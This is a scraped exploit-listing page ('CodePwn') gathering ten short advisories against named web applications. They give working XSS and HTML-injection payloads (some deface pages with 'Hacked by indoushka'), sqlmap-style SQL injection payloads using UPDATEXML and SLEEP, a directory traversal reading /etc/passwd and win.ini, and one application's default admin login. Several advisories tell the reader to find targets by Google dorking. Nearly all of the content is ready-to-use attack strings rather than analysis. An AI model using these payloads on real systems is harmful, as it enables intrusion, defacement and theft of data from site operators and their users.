Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : HaasCMS v1.0 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : http://haasit.com/ | | # Dork : Website Design by Haas IT Solutions, Inc. | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] use payload : /printobit.php?id=437999999.9'<marquee>Hacked by indoushka</marquee> [+] http://target_site/printobit.php?id=437999999.9%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Gusto - Recipes Management v1.5.1 System XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://www.elmanawy.info/demo/gusto/ | | # Dork : /profile/1-gusto | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] use Payload : /search?category_id=1&title=Mr.'"()%26%25<acx><script>alert(/indoushka/);</script> [+] https://127.0.0.1/elmanawyinfo/demo/gusto/recipes/search?category_id=1&title=Mr.%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Global Domains International v2.0 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://www.worldsite.ws/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] infected File : /idn-orderflow/index.dhtml [+] use Payload : /idn-orderflow/index.dhtml?act=pre_search&domains=Type a word&lang_original=af_</script><script>prompt(964811)</script>&no_new=true&search_from=frontpage&step=30&userid=bnftfnad&xs= [+] https://127.0.0.1/worldsitews/idn-orderflow/index.dhtml?act=pre_search&domains=Type%20a%20word&lang_original=af_%3C/script%3E%3Cscript%3Eprompt(964811)%3C/script%3E&no_new=true&search_from=frontpage&step=30&userid=bnftfnad&xs= Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : FlightPath LMS v5.0-rc2 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) | | # Vendor : http://getflightpath.com | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : /tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=<--`<script>alert(/indoushka/);</script>``> --!> [+] https://127.0.0.1/webservicesulmedu/flightpath/tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3E Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>## Title: Business-Directory-Script-3.2 SQLi ## Author: nu11secur1ty ## Date: 08/25/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/business-directory-script/#sectionDemo ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `column` parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the column parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Additionally, the payload (select*from(select(sleep(20)))a) was submitted in the column parameter. The application took 20271 milliseconds to respond to the request, compared with 230 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The attacker can steal all information from the database of the server of this application! STATUS: HIGH-CRITICAL Vulnerability [+]Payload: ```mysql --- Parameter: column (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: controller=pjAdminListings&action=pjActionGetListing&column=(UPDATEXML(2242,CONCAT(0x2e,0x716a767a71,(SELECT (ELT(2242=2242,1))),0x7178787671),5199))&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id= Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: controller=pjAdminListings&action=pjActionGetListing&column=(SELECT 6261 FROM (SELECT(SLEEP(15)))CMYC)&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Business-Directory-Script-Version%3A3.2/SQLi) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/08/business-directory-script-version32-sqli.html) ## Time spend: 01:35:00 </code></pre>

<pre><code>==================================================================================================================================== | # Title : Gusto - Recipes Management v1.5.1 System Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://www.elmanawy.info/demo/gusto/ | | # Dork : /profile/1-gusto | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] appears to leave a default administrative account in place post installation. [+] use Login : Email : admin@admin.com Password : 123456 [+] http://127.0.0.1/mbc1org/admin/dashboard Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Groupoffice v3.4.21 Directory Traversal Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : http://www.group-office.com | | # Dork : Powered by Group-Office | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /compress.php?file=../../../../../../../../../../windows/win.ini [+] http://127.0.0.1/aa-hwkorg/compress.php?file=../../../../../../../etc/passwd Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>============================================================================================================================ | # Title : Grawlix Cms v1.1.1 xss Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : http://getgrawlix.com/ | | # Dork : Powered by The Grawlix CMS | ============================================================================================================================ poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /_admin/panl.login.php?ref=/_admin/%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E [+] http://127.0.0.1/obarandacom/_admin/panl.login.php?ref=/_admin/%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E [+] php info : http://127.0.0.1/obarandacom/info.php Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Gravigra CMS v1.0 Sql injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : http://www.alwafaagroup.com/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /news.php?nid=1 ( inject her ) [+] use payload : http://127.0.0.1/gravigracom/news.php?nid=1 ( inject her ) Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Global Domains International v2.0 HTML inject Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://www.worldsite.ws/ | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] infected File : /index.dhtml [+] use Payload : /index.dhtml?sponsor=gditrafficws'"()%26%25<acx><marquee>Hacked by indoushka</marquee> [+] https://127.0.0.1/worldsitews/index.dhtml?sponsor=gditrafficws'"()%26%25<acx><marquee>Hacked by indoushka</marquee> Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>